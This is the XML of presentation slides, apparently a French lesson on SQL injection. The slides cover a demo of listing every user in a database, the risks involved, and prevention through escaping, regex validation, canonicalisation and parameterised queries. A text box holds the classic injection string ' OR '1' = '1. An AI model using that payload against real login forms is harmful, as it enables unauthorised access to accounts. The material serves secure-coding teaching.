      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Shape 145"/>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="f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2225776" y="1474599"/>
            <a:ext cx="4692449" cy="3908800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Shape 151"/>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52" name="Shape 152"/>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DEMO : lister tous les utilisateurs de la base</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Shape 15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11</a:t>
            </a:fld>
            <a:endParaRPr lang="f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3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="21389"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127000" y="2186875"/>
            <a:ext cx="6307899" cy="3773649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="159" name="Shape 159"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740725" y="1100124"/>
            <a:ext cx="5329924" cy="1918749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 16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61" name="Shape 16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Quels sont les risques ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="162" name="Shape 162"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="47155" t="3042" r="28920" b="13824"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6897267" y="3488100"/>
            <a:ext cx="2173382" cy="2303099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Shape 16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12</a:t>
            </a:fld>
            <a:endParaRPr lang="f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27000" y="105303"/>
            <a:ext cx="8339700" cy="436500"/>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69" name="Shape 169"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402150" y="1340075"/>
            <a:ext cx="8339700" cy="48788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SzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600" b="1"/>
              <a:t>Echappement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600" b="1"/>
              <a:t>Expressions régulières</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Canonisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Shape 170"/>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Prévention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Shape 171"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402150" y="2695575"/>
            <a:ext cx="8424900" cy="1443000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFEF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>⇒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> if (!ereg("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>^[a-z]+$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>", $_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>throw new Exception(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'Catégorie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5486400" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> invalide')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 172"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233625" y="4686600"/>
            <a:ext cx="9144000" cy="1798500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>06-01-02-03-04                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>06 01 02 03 04                                           0601020304</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>06.01.02.03.04                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:rPr>
              <a:t>       ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Shape 173"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="8487" b="29604"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3751350" y="4839001"/>
            <a:ext cx="1838374" cy="1277675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Shape 17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13</a:t>
            </a:fld>
            <a:endParaRPr lang="f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27000" y="105303"/>
            <a:ext cx="8339700" cy="436500"/>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80" name="Shape 180"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402150" y="1555287"/>
            <a:ext cx="8339700" cy="22721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SzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600" b="1"/>
              <a:t>Requête paramétrée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600"/>
              <a:t>En SQL : utilisation d’une Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Shape 18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Prévention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 182"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800400" y="3317875"/>
            <a:ext cx="8158500" cy="2663399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFEF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT u FROM UTILISATEUR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:=PWD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>AND login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:=LOGIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="138000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>query.setParameter ("PWD", password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>query.setParameter ("LOGIN", login);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="184" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6098175" y="5467500"/>
            <a:ext cx="905100" cy="244200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="CC0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7003275" y="5249250"/>
            <a:ext cx="1835699" cy="436500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="CC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fr" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1800" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1800" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1800" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1800" b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185" name="Shape 185"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="18399" b="19917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5927475" y="3357009"/>
            <a:ext cx="3031500" cy="1371340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Shape 186"/>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="f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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
